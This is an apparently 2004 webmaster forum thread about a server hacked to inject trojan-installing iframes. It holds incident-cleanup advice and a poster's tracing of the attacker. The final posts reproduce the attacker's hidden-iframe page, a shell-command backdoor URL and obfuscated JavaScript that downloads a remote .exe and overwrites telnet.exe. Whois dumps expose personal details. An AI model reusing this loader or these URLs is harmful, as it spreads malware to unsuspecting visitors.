Fucking Hacked Server!!!!!!!!!

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Makingcoin
    Confirmed User
    • Aug 2002
    • 8919

    #1

    Fucking Hacked Server!!!!!!!!!

    What info can you get on ths fucknut?

    http://www.whois.sc/trytoimprovesecurity.com

    Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

    The page is being hosted at trytoimprovesecurity.com

    Looks like his host is esthost.com

    What can be done in a situation like this?

    Thanks

    www.MAKINGCOIN.com

    icq. 166-662-831
    "Start making large coin!"


    Daddy I Get Paid To Be A Whore - Coming Soon
  • Babaganoosh
    ♥♥♥ Likes Hugs ♥♥♥
    • Nov 2001
    • 15841

    #2
    Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.
    I like pie.

    Comment

    • Chris
      Too lazy to set a custom title
      • May 2003
      • 27880

      #3
      depends what you want done and how much cash you want to put up
      [email protected]

      Comment

      • Makingcoin
        Confirmed User
        • Aug 2002
        • 8919

        #4
        Originally posted by Armed & Hammered
        Any idea how he got in? I'd figure that out first and plug the hole. Then you'll probably have to script something up to remove the iframe code recursively. Perl is your friend.
        Not sure exactlly how he got in. Host is working on it and writing a script up to change that shit.. Just want to know what can be done to this guy.

        www.MAKINGCOIN.com

        icq. 166-662-831
        "Start making large coin!"


        Daddy I Get Paid To Be A Whore - Coming Soon

        Comment

        • Babaganoosh
          ♥♥♥ Likes Hugs ♥♥♥
          • Nov 2001
          • 15841

          #5
          Originally posted by Makingcoin
          Not sure exactlly how he got in. Host is working on it and writing a script up to change that shit.. Just want to know what can be done to this guy.
          I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.
          I like pie.

          Comment

          • Makingcoin
            Confirmed User
            • Aug 2002
            • 8919

            #6
            Originally posted by Armed & Hammered
            I think I have a script here somewhere that will help you. I had to write one to change the counter code on a couple thousand pages when a certain counter started autoinstalling shit.
            Icqing you now.

            www.MAKINGCOIN.com

            icq. 166-662-831
            "Start making large coin!"


            Daddy I Get Paid To Be A Whore - Coming Soon

            Comment

            • NoCarrier
              We need more free porn
              • Mar 2002
              • 16356

              #7
              That sucks.. Anyone in mind who doesn't like you?

              Comment

              • KC
                Confirmed User
                • Jan 1995
                • 2417

                #8
                If the box was comprimised, then start over with a clean install on a new box. Don't think you can "plug" the hole and everything will be secure again.

                Once it's been compromised it's damaged goods.

                Jupiter Hosting, Inc.
                Vice President, Business Development
                kc (AT) jupiterhosting.com

                Comment

                • Dirty F
                  Too lazy to set a custom title
                  • Jul 2001
                  • 59204

                  #9
                  No, its a Russian dude, how is that possible. Russians and fucking things up?? wow, thats a new one.

                  Fuck, honestly, that part of the world should be disconnected from the net. Let them hack eachother.

                  Comment

                  • WarChild
                    Let slip the dogs of war.
                    • Jan 2003
                    • 17263

                    #10
                    Host at swiftwill.com instead.
                    .

                    Comment

                    • wdsguy
                      Ryde or Die
                      • Dec 2002
                      • 19568

                      #11
                      guess your host is not too update on security

                      Comment

                      • EviLGuY
                        So Fucking Banned
                        • Apr 2003
                        • 12745

                        #12
                        Originally posted by Makingcoin
                        What info can you get on ths fucknut?

                        http://www.whois.sc/trytoimprovesecurity.com

                        Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

                        The page is being hosted at trytoimprovesecurity.com

                        Looks like his host is esthost.com

                        What can be done in a situation like this?

                        Thanks
                        Not much if he's a Russian cocksucker. Suck it up and hire someone to lock down your box(es).

                        Comment

                        • Phoenix
                          BACON BACON BACON
                          • Nov 2002
                          • 35475

                          #13
                          I hope your host will compensate you

                          free month...or two....
                          Telegram PhoenixBrad
                          https://quantads.io

                          Comment

                          • Vitasoy
                            GFY HALL OF FAME DAMMIT!!!
                            • Oct 2003
                            • 58202

                            #14
                            Damn that certainly sucks. Sorry to hear.


                            [email protected]

                            Comment

                            • tootie
                              Confirmed User
                              • Jun 2003
                              • 6041

                              #15
                              I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.


                              Comment

                              • Ar3s
                                So Fucking Banned
                                • Feb 2004
                                • 4307

                                #16
                                sorry to hear mate
                                hope you will fix things up..
                                let us know..good LUCK!

                                Comment

                                • QuaWee
                                  Confirmed User
                                  • Jul 2004
                                  • 5791

                                  #17
                                  who's your host?
                                  i luv mainstream

                                  Comment

                                  • WarChild
                                    Let slip the dogs of war.
                                    • Jan 2003
                                    • 17263

                                    #18
                                    Originally posted by tootie
                                    I'll bet someone could make a pretty penny by moving to Russia and "taking care" of these guys that no one can seem to do anything about.
                                    And since storming in to a country to take on a part of (albeit a very, very small part) the local population is always a good idea.

                                    Once they're done there, the same person could pop in to Afghanistan and grab Bin Laden too. That's a quick what, $25 mil?
                                    .

                                    Comment

                                    • Fabien
                                      Confirmed User
                                      • Jul 2003
                                      • 4789

                                      #19
                                      Originally posted by NoCarrier
                                      That sucks.. Anyone in mind who doesn't like you?
                                      Ex wife ?

                                      Comment

                                      • fris
                                        I have to go potty
                                        • Aug 2002
                                        • 55730

                                        #20
                                        Originally posted by Makingcoin
                                        What info can you get on ths fucknut?

                                        http://www.whois.sc/trytoimprovesecurity.com

                                        Someone hacked my fucking server and put and iframe that installs a trojan on every single html page I have. Years of fucking gallleries, sites, everything.

                                        The page is being hosted at trytoimprovesecurity.com

                                        Looks like his host is esthost.com

                                        What can be done in a situation like this?

                                        Thanks
                                        well first off, if you would have secured your server before you put it online, then your data wouldnt have been insecure in the first place. i can garuantee you if i did a security audit on 100 machines on people on gfy, 85 would be insecure. no wonder all these sponsors are getting hacked. first thing you do when you buy a server is secure it. i never put any of my clients servers online until everything is locked up tight.
                                        Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                        My Latest Theme

                                        Comment

                                        • fris
                                          I have to go potty
                                          • Aug 2002
                                          • 55730

                                          #21
                                          Originally posted by Phoenix
                                          I hope your host will compensate you

                                          free month...or two....

                                          host is not responsable if its a server its up to the client. its his loss.
                                          Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                          My Latest Theme

                                          Comment

                                          • TwinTone
                                            Confirmed User
                                            • Jun 2003
                                            • 220

                                            #22
                                            Originally posted by Phoenix
                                            I hope your host will compensate you

                                            free month...or two....
                                            Certainly not the fault of the host, especially if its a non managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

                                            New holes, and buffer overflows come out all the time.. we as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, its just a matter of time until someone gets in.

                                            No machine is 100% secure.. its not possible, so you better do all you can to keep it up to date.

                                            Multi Homed Network - Amazing Service

                                            Contact me [email protected]
                                            ICQ 31353073

                                            Comment

                                            • JayJay
                                              Confirmed User
                                              • Jun 2002
                                              • 3739

                                              #23
                                              Ouch! that Sucks

                                              Comment

                                              • Aquarius
                                                Confirmed User
                                                • May 2004
                                                • 4754

                                                #24
                                                Fucking Russians

                                                Comment

                                                • Makingcoin
                                                  Confirmed User
                                                  • Aug 2002
                                                  • 8919

                                                  #25
                                                  Originally posted by TwinTone
                                                  Certainly not the fault of the host, especially if its a non managed server. Most of the reseller hosts wouldn't know how to secure a machine anyway.

                                                  New holes, and buffer overflows come out all the time.. we as a host try to alert customers of such things, and help them patch them. But unless you are paying a little more for a managed machine, or someone to take care of it, its just a matter of time until someone gets in.

                                                  No machine is 100% secure.. its not possible, so you better do all you can to keep it up to date.
                                                  It is a managed server. The host is taking care of me.

                                                  www.MAKINGCOIN.com

                                                  icq. 166-662-831
                                                  "Start making large coin!"


                                                  Daddy I Get Paid To Be A Whore - Coming Soon

                                                  Comment

                                                  • chaze
                                                    Confirmed User
                                                    • Aug 2002
                                                    • 9774

                                                    #26
                                                    You can do a search and replace for the entire home partition, then back everything up before the trojans runs again.

                                                    Then get new server, upload, and secure better.
                                                    Like the desert needs the rain
                                                    We do fully manged WordPress, VPS, and Servers. Adult Host Pro https://adulthostpro.com/ Since 2001

                                                    Comment

                                                    • GagOnMyCock
                                                      Registered User
                                                      • Aug 2004
                                                      • 30

                                                      #27
                                                      craig man that sucks

                                                      get your host to do back ups..

                                                      Comment

                                                      • fr8
                                                        Confirmed User
                                                        • Mar 2003
                                                        • 5074

                                                        #28
                                                        That shitty as hell. Hopefully he will get what is coming to him.
                                                        joesmut (a) gmail Dot com
                                                        Full Stack Developer

                                                        Comment

                                                        • VeriSexy
                                                          Join The Royal Family
                                                          • Apr 2002
                                                          • 25463

                                                          #29
                                                          Damn that sucks dude, get this guy to secure your box

                                                          http://www.rack911.com/security.php

                                                          Last edited by VeriSexy; 08-17-2004, 11:11 PM.
                                                          Looking for a KICK ASS TEEN SPONSOR? Check out ROYAL CASH - THE KING OF TEEN!
                                                          Incredible webmaster tools FHGs, Morphing Blog and RSS Feeds, Embedded FLV & WMV Videos
                                                          .
                                                          With TOP RATIO Sites like


                                                          ATMovs.com | iTeenVideo.com |
                                                          TeenSexMovs.com | TeenSexMania.com


                                                          Comment

                                                          • SplitInfinity
                                                            Confirmed User
                                                            • Dec 2002
                                                            • 3047

                                                            #30
                                                            Hola! Sorry to hear of your hacker incidents.

                                                            Some things you need to do right now:


                                                            nmap your server from another clean box:

                                                            Such as: nmap -p 1-65535 yourServersIPhere

                                                            Will produce results showing which backdoors if any port based ones
                                                            are listening in for the hacker to return. Look for ports that are not supposed
                                                            to be running. Ones that really stand out are ones that spell things with numbers such as: 31337 Which in hacker world spells elite (yeah they spell wrong)

                                                            Also look for hidden files and processes. When your server is hacked, the intruder
                                                            runs a rootkit which runs hidden processes on your system which you cannot see
                                                            because they replace your normal ps binary with a rooted/hacked ps binary that hides any process they wish to hide.

                                                            You can get a linux binary here:
                                                            http://www.splitinfinity.com/resources/cp

                                                            that you can run on your server.
                                                            Right click on that and choose save-as, then put it on the hacked box and type:
                                                            chmod 0755 cp
                                                            then:
                                                            ./cp

                                                            the results will show you any hidden processes running in your process tables.
                                                            It's a nice utility I use constantly to security audit machines here at SplitInfinity.

                                                            If your system has socklist installed, also run it: socklist
                                                            and study the results as they may point to hidden processes and ports running
                                                            as well.

                                                            Another great thing is: lsof
                                                            You use this to find where the hacker hid the files that are running as hidden processed because sometimes they can be hard to locate. lsof will show you the
                                                            source of the programs running and keeping files and ports open int he system.
                                                            before you kill any hidden processes, its always good to run lsof and take a look so you can actually FIND the crap they installed on your box so they can't remotely trigger it again. (Sometimes they install things in the public_html directories, or even startup items that restart their hack kits when you reboot)

                                                            Normally when your server is hacked, they replace all of the following binaries:

                                                            ls
                                                            lsof
                                                            md5sum
                                                            dir
                                                            ps
                                                            top
                                                            w
                                                            who
                                                            dirtree
                                                            socklist
                                                            ifconfig
                                                            /bin/login
                                                            sshd
                                                            ssh
                                                            proftpd
                                                            wuftpd
                                                            xinetd
                                                            inetd

                                                            and etc.... It is imperative that you start by installing a NEW md5sum package
                                                            and checking ALL your binaries against a known clean system and make sure the md5sum's match. Basically the md5sums are like fingerprints and if the file is at all what it is not supposed to be, those fingerprints wont match what the real file should be.

                                                            Example:

                                                            md5sum /bin/ls
                                                            typing that produces this result:
                                                            49da757b7b5ba585836ceb00086b6d98 /bin/ls

                                                            now if my /bin/ls was hacked, and a known true md5sum is the one above,
                                                            it would show completely different:

                                                            117c50271e390ba65561bce063301e7d /bin/ls

                                                            now I know that 49da757b7b5ba585836ceb00086b6d98 is the REAL md5sum
                                                            so if I get 117c50271e390ba65561bce063301e7d it must have been altered.

                                                            Also using the find command can find files that have been recently modified.
                                                            This only works if the hacker is sloppy as they normally replace find as well
                                                            and alter the dates so you cannot tell they modified anything....

                                                            Hidden files....
                                                            A simple:
                                                            locate ...
                                                            locate ".. "
                                                            might reveal some hidden directories they planted on your system
                                                            however keep in mind that locate was most likely hacked as well.

                                                            Anytime your system is compromised, you can replace all the binaries.
                                                            It's a good idea to back a backup of your system prior to putting it online
                                                            so you can simply restore a full set of binaries like /bin or /sbin in one fell swoop.
                                                            Once you know the binaries are ok, you can start to clean things up because you have the proper VIEW of your system.

                                                            Alot of people get hacked and then think they got the hacker out, but they only
                                                            think this because of the VIEW the hacker is giving them of their system.
                                                            They make things look normal when in fact they are far from it.
                                                            A hacker will sit an watch you and laugh about it the entire time.

                                                            If you need anything, security work, etc, feel free to call on us.

                                                            SplitInfinity Networks - Web Hosting, Co-location and Dedicated Servers
                                                            Managed - or Not. But always secure.

                                                            :-)

                                                            Comment

                                                            • BMI Lace
                                                              Too lazy to set a custom title
                                                              • Mar 2004
                                                              • 16116

                                                              #31
                                                              Sorry, didn't know this would cause such a problem.
                                                              I wont root anymore of your servers tonight.
                                                              Your Paysite Partner
                                                              Strength In Numbers!
                                                              StickyDollars | RadicalCash | KennysPennies | HomegrownCash

                                                              Comment

                                                              • Triple 6
                                                                Confirmed User
                                                                • Feb 2002
                                                                • 5394

                                                                #32
                                                                damn, sorry 2 hear about that
                                                                SIG TOO SMALL! Maximum 1200x600 button and no more than 30 text lines of ALL SIZES and COLORS. Unless your sig is for a GFY top banner sponsor, then you may use a 6240x4800 instead of a 1024x800.

                                                                Comment

                                                                • More Booze
                                                                  Confirmed User
                                                                  • Mar 2004
                                                                  • 5116

                                                                  #33
                                                                  Sorry to hear about that, my server was also hacked a couple of months ago.
                                                                  I was lucky because they didnt thouch anything.

                                                                  But I lost 3 years of galleries, free sites and everything within my work-folder last night.
                                                                  I was trying to install fedora and something got fucked up.

                                                                  Im trying to recover it now, GetDataBack didnt do the job.

                                                                  Comment

                                                                  • Preacher
                                                                    Confirmed User
                                                                    • Feb 2003
                                                                    • 2970

                                                                    #34
                                                                    that fucking sucks.. sorry to hear that...

                                                                    Comment

                                                                    • fuzebox
                                                                      making it rain
                                                                      • Oct 2003
                                                                      • 22353

                                                                      #35


                                                                      Was this a managed server?

                                                                      Comment

                                                                      • Makingcoin
                                                                        Confirmed User
                                                                        • Aug 2002
                                                                        • 8919

                                                                        #36
                                                                        Originally posted by fuzebox


                                                                        Was this a managed server?
                                                                        Yes.

                                                                        www.MAKINGCOIN.com

                                                                        icq. 166-662-831
                                                                        "Start making large coin!"


                                                                        Daddy I Get Paid To Be A Whore - Coming Soon

                                                                        Comment

                                                                        • SplitInfinity
                                                                          Confirmed User
                                                                          • Dec 2002
                                                                          • 3047

                                                                          #37
                                                                          Ya know, since you are in the process of fixing everything.....

                                                                          Why not move to a clean box over here that was secured before it went on-net?

                                                                          I have a box ready for you right now......

                                                                          ICQ: 64791506
                                                                          AIM: NJesterIII
                                                                          Email: [email protected]

                                                                          Comment

                                                                          • fuzebox
                                                                            making it rain
                                                                            • Oct 2003
                                                                            • 22353

                                                                            #38
                                                                            Originally posted by Makingcoin
                                                                            Yes.
                                                                            I would never trust one ;)

                                                                            Comment

                                                                            • PowerCum
                                                                              CjOverkill
                                                                              • Apr 2003
                                                                              • 1328

                                                                              #39
                                                                              First of all... CHANGE HOSTING COMPANY. If you want some secure box quotes ICQ me 171216535.
                                                                              Second, while you are still on that hacked server take a look at the apache config... probably he installed mod_layout and is just putting a layout on your pages. If no then use sed to change all the html files in bulk. There is no need for a complex script... sed can do the work.
                                                                              CjOverkill Traffic Trading Script
                                                                              Free, secure and fast traffic trading script. Get your copy now

                                                                              Comment

                                                                              • SplitInfinity
                                                                                Confirmed User
                                                                                • Dec 2002
                                                                                • 3047

                                                                                #40
                                                                                Not sure if you noticed or not, but the apache server error shows another host/domain name, xpire.info. This is the same, but different info. I wonder if the
                                                                                name is real or the phone numbers on this on. Doubtful, but maybe he slipped up?


                                                                                Domain ID:D5946452-LRMS
                                                                                Domain Name:XPIRE.INFO
                                                                                Created On:23-May-2004 19:41:15 UTC
                                                                                Last Updated On:02-Aug-2004 08:07:20 UTC
                                                                                Expiration Date:23-May-2005 19:41:15 UTC
                                                                                Sponsoring Registrar:R159-LRMS
                                                                                Status:ACTIVE
                                                                                Status:OK
                                                                                Registrant ID:C4752858-LRMS
                                                                                Registrant Name:Mike Fox
                                                                                Registrant Organization:n/a
                                                                                Registrant Street1:Hali-gali, 77
                                                                                Registrant City:Deli
                                                                                Registrant Postal Code:12345
                                                                                Registrant Country:IN
                                                                                Registrant Phone:+91.226370256
                                                                                Registrant Email:[email protected]
                                                                                Admin ID:C4752858-LRMS
                                                                                Admin Name:Mike Fox
                                                                                Admin Organization:n/a
                                                                                Admin Street1:Hali-gali, 77
                                                                                Admin City:Deli
                                                                                Admin Postal Code:12345
                                                                                Admin Country:IN
                                                                                Admin Phone:+91.226370256
                                                                                Admin Email:[email protected]
                                                                                Billing ID:C4752858-LRMS
                                                                                Billing Name:Mike Fox
                                                                                Billing Organization:n/a
                                                                                Billing Street1:Hali-gali, 77
                                                                                Billing City:Deli
                                                                                Billing Postal Code:12345
                                                                                Billing Country:IN
                                                                                Billing Phone:+91.226370256
                                                                                Billing Email:[email protected]
                                                                                Tech ID:C4752858-LRMS
                                                                                Tech Name:Mike Fox
                                                                                Tech Organization:n/a
                                                                                Tech Street1:Hali-gali, 77
                                                                                Tech City:Deli
                                                                                Tech Postal Code:12345
                                                                                Tech Country:IN
                                                                                Tech Phone:+91.226370256
                                                                                Tech Email:[email protected]
                                                                                Name Server:NS1.SMARTDNS.ORG
                                                                                Name Server:NS2.SMARTDNS.ORG
                                                                                Name Server:NS1.SMARTNIC.ORG
                                                                                Name Server:NS2.SMARTNIC.ORG

                                                                                Comment

                                                                                • Drama Bot V.1
                                                                                  Confirmed User
                                                                                  • Jul 2004
                                                                                  • 200

                                                                                  #41
                                                                                  I clicked your site yesterday and got viruses, spywares and shit on my computer! Spent all last night deleting that shit! Thank's a lot....
                                                                                  SIG TOO BIG! Maximum 120x60 button and no more than 3 text lines of DEFAULT SIZE and COLOR. Unless your sig is for a GFY top banner sponsor, you may use a 624x80 instead of a 120x60. Let me repeat... A 120 x 60 button and no more that 3 lines of DEFAULT SIZE AND COLOR text.

                                                                                  Comment

                                                                                  • fris
                                                                                    I have to go potty
                                                                                    • Aug 2002
                                                                                    • 55730

                                                                                    #42
                                                                                    its its managed, the security is all their fault. they have no idea what is going on. they are clueless.
                                                                                    Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                                                                    My Latest Theme

                                                                                    Comment

                                                                                    • SplitInfinity
                                                                                      Confirmed User
                                                                                      • Dec 2002
                                                                                      • 3047

                                                                                      #43
                                                                                      Learning more about this hacker....

                                                                                      xpire.info = A rooted server of someone elses.... I found a backdoor he installed:


                                                                                      Http://xpire.info/s/2
                                                                                      http://xpire.info/s/2?=$REQUEST_URI;?

                                                                                      Take a peek. That allows him to run shell commands.

                                                                                      Trying to locate him, I found his thing hidden atop this site:
                                                                                      http://www.allo-webmaster.com/heberg...xpire.info/s/2
                                                                                      Look at the small print on the top...

                                                                                      Might wanna see if he owns that site or if the owner of the site can explain why that link is on the top? Perhaps he is compromised as well? Perhaps this IS him?

                                                                                      The Registry database contains ONLY .COM, .NET, .EDU domains and
                                                                                      Registrars.
                                                                                      %% BookMyName Whois version 1.0
                                                                                      %%
                                                                                      DOMAIN
                                                                                      Domain Name : allo-webmaster.com (AWC18-BMN-DOM)
                                                                                      Registrar : BookMyName
                                                                                      Whois Server : whois.bookmyname.com
                                                                                      Referral URL : https://www.bookmyname.com

                                                                                      Registrant / Admin Contact :
                                                                                      PERSON
                                                                                      Zak SADIQ (SADIQ2-BMN-PE)

                                                                                      hay salam 70

                                                                                      11000 Sale
                                                                                      FRANCE
                                                                                      phone : 02147483647
                                                                                      fax :
                                                                                      e-mail : [email protected]


                                                                                      Billing Contact :
                                                                                      PERSON
                                                                                      Zak SADIQ (SADIQ2-BMN-PE)

                                                                                      hay salam 70

                                                                                      11000 Sale
                                                                                      FRANCE
                                                                                      phone : 02147483647
                                                                                      fax :
                                                                                      e-mail : [email protected]


                                                                                      Technical Contact :
                                                                                      PERSON
                                                                                      Zak SADIQ (SADIQ2-BMN-PE)

                                                                                      hay salam 70

                                                                                      11000 Sale
                                                                                      FRANCE
                                                                                      phone : 02147483647
                                                                                      fax :
                                                                                      e-mail : [email protected]


                                                                                      Domain servers :
                                                                                      ns1.publi6.net (NPN23-BMN-HST)

                                                                                      ns2.publi6.net (NPN24-BMN-HST)


                                                                                      Created on 03/10/2004 18:21:45
                                                                                      Updated on 04/02/2004 14:49:02
                                                                                      Expires on 03/10/2005 13:21:45

                                                                                      Interesting HTML:

                                                                                      <title>Http://xpire.info/s/2 : recherche sur Http://xpire.info/s/2</title>hahahahahaha name="description" content="Http://xpire.info/s/2 ">
                                                                                      hahahahahaha name="keywords" content="Http://xpire.info/s/2">
                                                                                      hahahahahaha name="revisit-after" content="15 days">
                                                                                      hahahahahaha name="robots" content="index,follow">
                                                                                      hahahahahaha NAME="Language" CONTENT="fr">
                                                                                      hahahahahaha name="rating" content="General">
                                                                                      hahahahahaha name="resource-type" content="document">
                                                                                      hahahahahaha name="distribution" content="Global">
                                                                                      hahahahahaha name="copyright" content="Copyright (C), 2004, Allo webmaster , Http://xpire.info/s/2 ">
                                                                                      hahahahahaha name="author" CONTENT="Zaki">
                                                                                      hahahahahaha NAME="Language" CONTENT="fr">
                                                                                      hahahahahaha NAME="Identifier-URL" CONTENT="http://www.allo-webmaster.com">
                                                                                      hahahahahaha NAME="Reply-to" CONTENT="[email protected]">
                                                                                      hahahahahaha hahahahahahahahahaha="Content-Type" content="text/html; charset=iso-8859-1">
                                                                                      <link href="http://www.allo-webmaster.com/style.css" rel="stylesheet" type="text/css">

                                                                                      Comment

                                                                                      • SplitInfinity
                                                                                        Confirmed User
                                                                                        • Dec 2002
                                                                                        • 3047

                                                                                        #44
                                                                                        Here is another domain he owns/owned:

                                                                                        Domain Name: B00GLE.COM

                                                                                        Registrant:
                                                                                        n/a
                                                                                        Janet Jacjson ([email protected])
                                                                                        Hali-gali, 77
                                                                                        Deli
                                                                                        null,12345
                                                                                        IN
                                                                                        Tel. +91.226370256

                                                                                        Creation Date: 31-Mar-2004
                                                                                        Expiration Date: 31-Mar-2005

                                                                                        Domain servers in listed order:
                                                                                        ns1.smartdns.org
                                                                                        ns2.smartdns.org
                                                                                        ns1.smartnic.org
                                                                                        ns2.smartnic.org


                                                                                        Administrative Contact:
                                                                                        n/a
                                                                                        Janet Jacjson ([email protected])
                                                                                        Hali-gali, 77
                                                                                        Deli
                                                                                        null,12345
                                                                                        IN
                                                                                        Tel. +91.226370256

                                                                                        Technical Contact:
                                                                                        n/a
                                                                                        Janet Jacjson ([email protected])
                                                                                        Hali-gali, 77
                                                                                        Deli
                                                                                        null,12345
                                                                                        IN
                                                                                        Tel. +91.226370256

                                                                                        Billing Contact:
                                                                                        n/a
                                                                                        Janet Jacjson ([email protected])
                                                                                        Hali-gali, 77
                                                                                        Deli
                                                                                        null,12345
                                                                                        IN
                                                                                        Tel. +91.226370256

                                                                                        Status:SUSPENDED
                                                                                        Note: This Domain Name is Suspended. In this status the domain name is
                                                                                        InActive and will not function.

                                                                                        Comment

                                                                                        • SplitInfinity
                                                                                          Confirmed User
                                                                                          • Dec 2002
                                                                                          • 3047

                                                                                          #45
                                                                                          Seems that that server (the xpire.info one) is running a proxy server:

                                                                                          Interesting ports on 202.99.23.162:
                                                                                          (The 1653 ports scanned but not shown below are in state: filtered)
                                                                                          PORT STATE SERVICE
                                                                                          20/tcp closed ftp-data
                                                                                          21/tcp open ftp
                                                                                          80/tcp open http
                                                                                          8080/tcp closed http-proxy

                                                                                          Comment

                                                                                          • SplitInfinity
                                                                                            Confirmed User
                                                                                            • Dec 2002
                                                                                            • 3047

                                                                                            #46
                                                                                            This is the root site on the server:

                                                                                            http://202.99.23.162/


                                                                                            Not sure what language it is, but that is who the main owner of the server seems to be.

                                                                                            Comment

                                                                                            • SplitInfinity
                                                                                              Confirmed User
                                                                                              • Dec 2002
                                                                                              • 3047

                                                                                              #47
                                                                                              He seems to center around xpire.com and b00gle.com:


                                                                                              http://qkacdesign.uw.hu/chcounter/st...rs_days_stats=

                                                                                              Comment

                                                                                              • SplitInfinity
                                                                                                Confirmed User
                                                                                                • Dec 2002
                                                                                                • 3047

                                                                                                #48
                                                                                                Kinda sloppy, I'm finding lots about him:

                                                                                                Http://xpire.info/s/search.php?q=Http://


                                                                                                :-)

                                                                                                Comment

                                                                                                • SplitInfinity
                                                                                                  Confirmed User
                                                                                                  • Dec 2002
                                                                                                  • 3047

                                                                                                  #49
                                                                                                  Seems he is busy at work, that link does not work anymore, howver this one began to:

                                                                                                  http://www.xpire.info/fa/tool.html

                                                                                                  This is what the source of tht page look like:

                                                                                                  Code:
                                                                                                  <html>
                                                                                                  hahahahahaha>
                                                                                                  </head>
                                                                                                  <body bgcolor="Black">
                                                                                                  <iframe src="http://TryToImproveSecurity.com/fa/t3.htm" width=1 height=1></iframe>
                                                                                                  <!--<iframe src="http://TryToImproveSecurity.com/fa/test.html" width=1 height=1></iframe>//-->
                                                                                                  <iframe src="http://TryToImproveSecurity.com/fa/x.htm" width=1 height=1></iframe>
                                                                                                  <iframe src="http://TryToImproveSecurity.com/fa/proc.htm" width=1 height=1></iframe>
                                                                                                  <iframe src="http://www.TryToImproveSecurity.com/fa/runevil.htm" width=1 height=1></iframe>
                                                                                                  <IFRAME SRC="http://x.full-tgp.net/?fox.com" WIDTH=1 HEIGHT=1></IFRAME>
                                                                                                  <iframe src="http://213.159.117.131/dl/fox.php" width=1 height=1></iframe>
                                                                                                  </body>
                                                                                                  </html>

                                                                                                  Comment

                                                                                                  • SplitInfinity
                                                                                                    Confirmed User
                                                                                                    • Dec 2002
                                                                                                    • 3047

                                                                                                    #50
                                                                                                    Surely this guy is doing some bad shit:
                                                                                                    Notice the telnet calls?







                                                                                                    Code:
                                                                                                    var downloadurl="http://213.159.117.133/dl/loadadv65.exe";
                                                                                                    
                                                                                                    if(navigator.appVersion.hahahahahahaha("Windows NT 5.1")!=-1) savetopath="C:\\WINDOWS\\system32\\telnet.exe";
                                                                                                    if(navigator.appVersion.hahahahahahaha("Windows NT 5.0")!=-1) savetopath="C:\\WINNT\\system32\\telnet.exe";
                                                                                                    
                                                                                                    payloadURL = downloadurl;
                                                                                                    var x = new ActiveXObject("Microsoft.XMLHTTP");
                                                                                                    xhahahahahaha("GET",payloadURL,0);
                                                                                                    x.Send();
                                                                                                    
                                                                                                    function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }
                                                                                                    
                                                                                                    var s = new ActiveXObject(bla());
                                                                                                    s.Mode = 3;
                                                                                                    s.Type = 1;
                                                                                                    shahahahahaha();
                                                                                                    s.Write(x.responseBody);
                                                                                                    s.SaveToFile(savetopath,2);
                                                                                                    
                                                                                                    location.href = "telnet://";

                                                                                                    Comment

                                                                                                    Working...